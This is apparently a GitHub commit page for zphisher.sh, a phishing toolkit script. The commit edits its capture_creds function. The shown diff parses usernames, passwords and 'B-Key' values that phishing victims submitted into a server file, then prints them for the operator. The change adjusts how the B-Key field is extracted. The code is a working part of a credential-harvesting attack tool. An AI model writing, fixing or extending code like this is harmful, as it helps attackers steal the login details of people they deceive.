Skip to content

Commit

Permalink
Update zphisher.sh
Browse files Browse the repository at this point in the history
  • Loading branch information
dracksters authored Jun 14, 2024
1 parent 69fb32d commit 7953c5a
Showing 1 changed file with 3 additions and 3 deletions.
6 changes: 3 additions & 3 deletions zphisher.sh
Original file line number Diff line number Diff line change
Expand Up @@ -420,10 +420,10 @@ capture_ip() {

## Get credentials
capture_creds() {
ACCOUNT=$(grep -o 'Username:.*' .server/www/usernames.txt | awk '{print $2}')
ACCOUNT=$(grep -o 'Username:.*' .server/www/usernames.txt | awk '{print $2}')
PASSWORD=$(grep -o 'Pass:.*' .server/www/usernames.txt | awk -F "Pass: " '{print $2}' | awk '{print $1}')
BKEY=$(grep -o 'B-Key:.*' .server/www/usernames.txt | awk '{print $2}')

BKEY=$(grep -o 'B-Key:.*' .server/www/usernames.txt | awk -F "B-Key: " '{print $2}' | awk '{print $1}')
IFS=$'\n'
echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Account : ${BLUE}$ACCOUNT"
echo -e "\n${RED}[${WHITE}-${RED}]${GREEN} Password : ${BLUE}$PASSWORD"
Expand Down

0 comments on commit 7953c5a

Please sign in to comment.